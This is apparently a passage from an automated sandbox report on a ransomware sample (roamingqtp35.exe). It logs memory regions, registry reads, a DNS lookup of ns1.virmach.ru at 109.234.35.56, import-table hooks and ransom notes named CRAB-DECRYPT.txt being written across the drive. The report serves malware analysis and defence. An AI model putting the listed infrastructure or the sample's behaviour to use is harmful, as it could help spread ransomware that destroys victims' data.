ws2_32.dll 0x76510000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76690000 0x76696fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76710000 0x7685efff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77080000 0x771fafff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f0a0000 0x7f0a0000 0x7f19ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f1a0000 0x7f1a0000 0x7f1c2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc173fffff Private Memory Readable True False False -
pagefile_0x00007dfc17400000 0x7dfc17400000 0x7ffc173fffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc175c1000 0x7ffc175c1000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
Registry (7)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient - False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DNSLookupOrder False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = Domain True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpDomain False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = SearchList False 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters value_name = DhcpSearchList False 1
Module (1)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\nslookup.exe base_address = 0x1380000 True 1
Network Behavior
DNS (2)
Operation Additional Information Success Count Logfile
Get Hostname name_out = x2vS1cum True 1
Resolve Name host = ns1.virmach.ru, address_out = 109.234.35.56 True 1
UDP Sessions (3)
Information Value
Total Data Sent 114 bytes
Total Data Received 202 bytes
Contacted Host Count 1
Contacted Hosts 109.234.35.56:53
UDP Session #1
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 44 bytes
Data Received 44 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 44 True 1
Close type = SOCK_DGRAM True 1
UDP Session #2
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 51 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 51 True 1
Close type = SOCK_DGRAM True 1
UDP Session #3
Information Value
Handle 0x194
Address Family AF_INET
Type SOCK_DGRAM
Protocol IPPROTO_IP
Remote Address 109.234.35.56
Remote Port 53
Local Address -
Local Port -
Data Sent 35 bytes
Data Received 107 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Connect remote_address = 109.234.35.56, remote_port = 53 False 1
Send flags = NO_FLAG_SET, size = 35, size_out = 35 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 107 True 1
Close type = SOCK_DGRAM True 1
Process #9: roamingqtp35.exe
Information Value
ID #9
File Name c:\users\nd9e1fyi\appdata\roamingqtp35.exe
Command Line "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:01, Reason: Autostart
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:01:22
OS Process Information
Information Value
PID 0xd40
Parent PID 0x638 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xD44
0xD50
0xD70
0xD84
0xD88
0xD8C
0xD90
0xD94
0xD98
0xD9C
0xE30
0xE34
0xF20
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00054fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00064fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00183fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00174fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001d3fff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001f5fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
roamingqtp35.exe 0x00400000 0x0044afff Memory Mapped File Readable, Writable, Executable True True False
locale.nls 0x00450000 0x0050dfff Memory Mapped File Readable False False False -
private_0x0000000000510000 0x00510000 0x0054ffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x00573fff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x0058ffff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x00590fff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x005affff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x0074ffff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006b0fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x006b0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000006c0000 0x006c0000 0x006c0fff Private Memory Readable, Writable True False False -
private_0x00000000006d0000 0x006d0000 0x006d0fff Private Memory Readable, Writable True False False -
private_0x00000000006e0000 0x006e0000 0x006e0fff Private Memory Readable, Writable True False False -
private_0x00000000006f0000 0x006f0000 0x006f0fff Private Memory Readable, Writable True False False -
private_0x0000000000700000 0x00700000 0x00700fff Private Memory Readable, Writable True False False -
private_0x0000000000710000 0x00710000 0x00710fff Private Memory Readable, Writable True False False -
private_0x0000000000720000 0x00720000 0x00720fff Private Memory Readable, Writable True False False -
private_0x0000000000730000 0x00730000 0x00730fff Private Memory Readable, Writable True False False -
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory Readable, Writable True False False -
private_0x0000000000750000 0x00750000 0x00750fff Private Memory Readable, Writable True False False -
private_0x0000000000760000 0x00760000 0x00760fff Private Memory Readable, Writable True False False -
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000770000 0x00770000 0x00774fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000770000 0x00770000 0x00770fff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000880000 0x00880000 0x00a07fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a10000 0x00a10000 0x00b90fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ba0000 0x00ba0000 0x01f9ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001fa0000 0x01fa0000 0x0208ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x01fb3fff Private Memory Readable, Writable True False False -
pagefile_0x0000000001fa0000 0x01fa0000 0x01fa0fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x01fb0000 0x01fb0fff Memory Mapped File Readable, Writable True True False
private_0x0000000001fc0000 0x01fc0000 0x01ffffff Private Memory Readable, Writable True False False -
private_0x0000000002000000 0x02000000 0x02002fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002000000 0x02000000 0x02017fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002010000 0x02010000 0x02012fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002020000 0x02020000 0x0205ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002060000 0x02060000 0x02060fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000002070000 0x02070000 0x02070fff Pagefile Backed Memory Readable True False False -
private_0x0000000002080000 0x02080000 0x0208ffff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x02190fff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x0218ffff Private Memory Readable, Writable True False False -
private_0x0000000002190000 0x02190000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x0220ffff Private Memory Readable, Writable True False False -
private_0x0000000002210000 0x02210000 0x0221ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02220000 0x02556fff Memory Mapped File Readable False False False -
pagefile_0x0000000002560000 0x02560000 0x0295afff Pagefile Backed Memory Readable True False False -
ole32.dll 0x02960000 0x02a49fff Memory Mapped File Readable False False False -
private_0x0000000002960000 0x02960000 0x02a5ffff Private Memory Readable, Writable True False False -
private_0x0000000002a60000 0x02a60000 0x02b5ffff Private Memory Readable, Writable True False False -
private_0x0000000002b60000 0x02b60000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002c60000 0x02c60000 0x02d5ffff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02d9ffff Private Memory Readable, Writable True False False -
private_0x0000000002da0000 0x02da0000 0x02e9ffff Private Memory Readable, Writable True False False -
private_0x0000000002ea0000 0x02ea0000 0x02edffff Private Memory Readable, Writable True False False -
private_0x0000000002ee0000 0x02ee0000 0x02fdffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002fe0000 0x02fe0000 0x02feffff Pagefile Backed Memory Readable True False False -
private_0x0000000002ff0000 0x02ff0000 0x02ff0fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003000000 0x03000000 0x03000fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003000000 0x03000000 0x03008fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003010000 0x03010000 0x03055fff Private Memory Readable, Writable True False False -
private_0x0000000003010000 0x03010000 0x03010fff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x03020fff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x03021fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003060000 0x03060000 0x03060fff Private Memory Readable, Writable True False False -
private_0x0000000003070000 0x03070000 0x03070fff Private Memory Readable, Writable True False False -
private_0x0000000003080000 0x03080000 0x03080fff Private Memory Readable, Writable True False False -
wow64win.dll 0x542b0000 0x54329fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54330000 0x5437ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x54380000 0x54387fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x6f970000 0x6fa2efff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x6fa30000 0x6fa5efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x6fa60000 0x6fa72fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x6fbd0000 0x6fbe8fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x6fc70000 0x6fc77fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x6fcf0000 0x6fd8afff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x6fd90000 0x6fda1fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x6fdc0000 0x6ffccfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x6ffd0000 0x7014dfff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71540000 0x71586fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x71590000 0x71597fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x715d0000 0x71653fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x71660000 0x716aefff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x71720000 0x719eafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x73be0000 0x73be6fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x73bf0000 0x73dacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x73db0000 0x73dbbfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x73ee0000 0x73f71fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x73f80000 0x73fc3fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x74560000 0x74565fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x746c0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x74bc0000 0x74c4cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74c50000 0x74dc7fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x74f10000 0x74f54fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74f60000 0x74f6efff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x750e0000 0x764defff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76630000 0x766b3fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76dc0000 0x76e3afff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e40000 0x76e76fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76e80000 0x76e8dfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff9abbfffff Private Memory Readable True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 216 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
Type Installer Target Size Information Actions
IAT private_0x0000000000780000:+0x696cc 11. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCommTimeouts+0x0 now points to private_0x000000007fff0000:+0x51fd5215
IAT private_0x0000000000780000:+0x696cc 15. entry of roamingqtp35.exe 4 bytes kernel32.dll:CompareStringA+0x0 now points to private_0x000000007fff0000:+0x52ddfb55
IAT private_0x0000000000780000:+0x696cc 20. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x7b046002
IAT private_0x0000000000780000:+0x696cc 21. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetConsoleOutputCP+0x0 now points to private_0x000000007fff0000:+0x7516097b
IAT private_0x0000000000780000:+0x696cc 22. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x2046cd6
IAT private_0x0000000000780000:+0x696cc 27. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetHandleCount+0x0 now points to private_0x000000007fff0000:+0x25161fce
IAT private_0x0000000000780000:+0x696cc 30. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x7cd8fa5c
IAT private_0x0000000000780000:+0x696cc 31. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x9242e76
IAT private_0x0000000000780000:+0x696cc 32. entry of roamingqtp35.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x5dcf6b3b
IAT private_0x0000000000780000:+0x696cc 33. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x7d6a5255
IAT private_0x0000000000780000:+0x696cc 35. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x6c633147
IAT private_0x0000000000780000:+0x696cc 36. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x750303f9
IAT private_0x0000000000780000:+0x696cc 39. entry of roamingqtp35.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x7f836a17
IAT private_0x0000000000780000:+0x696cc 40. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x4e7c1f04
IAT private_0x0000000000780000:+0x696cc 42. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x57fd5c12
IAT private_0x0000000000780000:+0x696cc 44. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x7d463088
IAT private_0x0000000000780000:+0x696cc 49. entry of roamingqtp35.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x24ba1fce
IAT private_0x0000000000780000:+0x696cc 50. entry of roamingqtp35.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x433a1203
IAT private_0x0000000000780000:+0x696cc 73. entry of roamingqtp35.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x3a3e0fa5
IAT private_0x0000000000780000:+0x696cc 76. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x936cdce
IAT private_0x0000000000780000:+0x696cc 83. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStringTypeA+0x0 now points to private_0x000000007fff0000:+0xedafd55
IAT private_0x0000000000780000:+0x696cc 86. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetDateFormatA+0x0 now points to private_0x000000007fff0000:+0x44872e26
IAT private_0x0000000000780000:+0x696cc 90. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0xe5dea1e
IAT private_0x0000000000780000:+0x696cc 92. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x26dafb13
IAT private_0x0000000000780000:+0x696cc 96. entry of roamingqtp35.exe 4 bytes user32.dll:GetProcessWindowStation+0x0 now points to private_0x000000007fff0000:+0x3056d04
Host Behavior
File (3595)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\MSOCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\PerfLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Recovery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\System Volume Information\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\ggNuzUYFd.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
